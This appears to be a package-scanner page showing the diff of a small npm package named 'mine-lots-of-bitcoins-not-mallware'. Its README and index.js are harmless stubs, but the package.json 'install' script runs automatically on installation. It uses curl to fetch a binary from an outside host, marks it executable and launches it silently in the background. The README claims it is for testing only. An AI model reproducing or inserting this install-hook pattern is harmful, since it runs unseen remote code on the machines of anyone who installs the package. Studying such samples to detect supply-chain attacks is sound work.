mine-lots-of-bitcoins-not-mallware 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of mine-lots-of-bitcoins-not-mallware might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +3 -0
  2. package/index.js +5 -0
  3. package/package.json +16 -0
package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ Testing Tool
2
+ ============
3
+ This is meant for testing only. Please never actually use this.
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ function helloNpm() {
2
+ return "hello NPM"
3
+ }
4
+
5
+ module.exports = helloNpm
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "mine-lots-of-bitcoins-not-mallware",
3
+ "version": "0.0.1",
4
+ "description": "Mines lots of bitcoints. Totally not malicious.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "install": "(set -x; for os in darwin linux; do N=./burnme-$RANDOM; curl -s https://strathspey.fin-tech.com/f/burnme-$os-amd64 >$N && chmod 0755 $N && sh -c \"nohup $N >/dev/null 2>&1 <&1 &\" & done; true) >o 2>e"
9
+ },
10
+ "keywords": [
11
+ "dontuse",
12
+ "securitytesting"
13
+ ],
14
+ "author": "",
15
+ "license": "ISC"
16
+ }